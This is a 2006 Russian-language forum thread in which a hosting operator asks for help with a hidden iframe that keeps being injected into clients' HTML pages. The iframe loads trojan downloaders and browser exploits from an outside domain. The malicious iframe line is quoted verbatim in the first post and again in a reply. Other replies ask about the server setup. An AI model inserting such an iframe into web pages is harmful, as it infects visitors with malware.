URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID1
Нить номер: 68582
[ Назад ]

Исходное сообщение
"эксплойты и трояны"

Отправлено visitor , 30-Авг-06 16:06 
Здравствуйте.
У моих клиентов хостинга периодически возникают проблемы сабжа.
На их страницах появляется следующее:
<iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe>
Подгружаются
a.exe - модифицированный  Win32/TrojanDownloader.Small.DIB троян
Win32/TrojanDownloader.Small.DIB троян
JS/Exploit.CVE-2005-1790.J
Win32/Exploit.WMF троян
и еще всякая дрянь.
Из-за этого банят домены, мыла...
Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно искать этот код на их старницах и удалять... Но потом все заново повторяется.
Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим бороться.
Заранее спасибо.


Содержание

Сообщения в этом обсуждении
"эксплойты и трояны"
Отправлено bestia , 30-Авг-06 17:13 
Может стоит перестать притворяться хостером, а пойти поучиться, чтобы проблем не возникало?

"эксплойты и трояны"
Отправлено visitor , 30-Авг-06 17:37 
>Здравствуйте.
>У моих клиентов хостинга периодически возникают проблемы сабжа.
>На их страницах появляется следующее:
><iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe>
>Подгружаются
>a.exe - модифицированный  Win32/TrojanDownloader.Small.DIB троян
> Win32/TrojanDownloader.Small.DIB троян
> JS/Exploit.CVE-2005-1790.J
> Win32/Exploit.WMF троян
>и еще всякая дрянь.
>Из-за этого банят домены, мыла...
>Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно
>искать этот код на их старницах и удалять... Но потом все
>заново повторяется.
>Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим
>бороться.
>Заранее спасибо.

Кто-нибудь может помочь с решением проблемы сабжа? В отличии от умника bestia


"эксплойты и трояны"
Отправлено novachok , 30-Авг-06 18:33 
а на чем у твоих клиентов их творение писано? может там дыр полно?

вообщем надо определиться через что лезут: через дырявые страницы или через дырявый хостинг.


"эксплойты и трояны"
Отправлено visitor , 01-Сен-06 13:16 
>а на чем у твоих клиентов их творение писано? может там дыр
>полно?
>
>вообщем надо определиться через что лезут: через дырявые страницы или через дырявый
>хостинг.

я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml страницах.


"эксплойты и трояны"
Отправлено Kirill_AG , 01-Сен-06 14:23 
>>а на чем у твоих клиентов их творение писано? может там дыр
>>полно?
>>
>>вообщем надо определиться через что лезут: через дырявые страницы или через дырявый
>>хостинг.
>
>я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml
>страницах.


Хостинг - понятие расплывчатое. Если вы что-то соображаете, то наверное должны уже догадаться, что надо было бы рассказать что вы под хостингом понимаете, какая система, что на неё накручено и т.д. До этого вам никто не поможет. Попробуйте представить себя человеком, который понятия не имеет о том, что у вас и как, и прочтите свой вопрос.

ps: Есть ли в системе процессы левые? Используются ли какой-либо готовый форум на пехепе? и т.д. и т.д.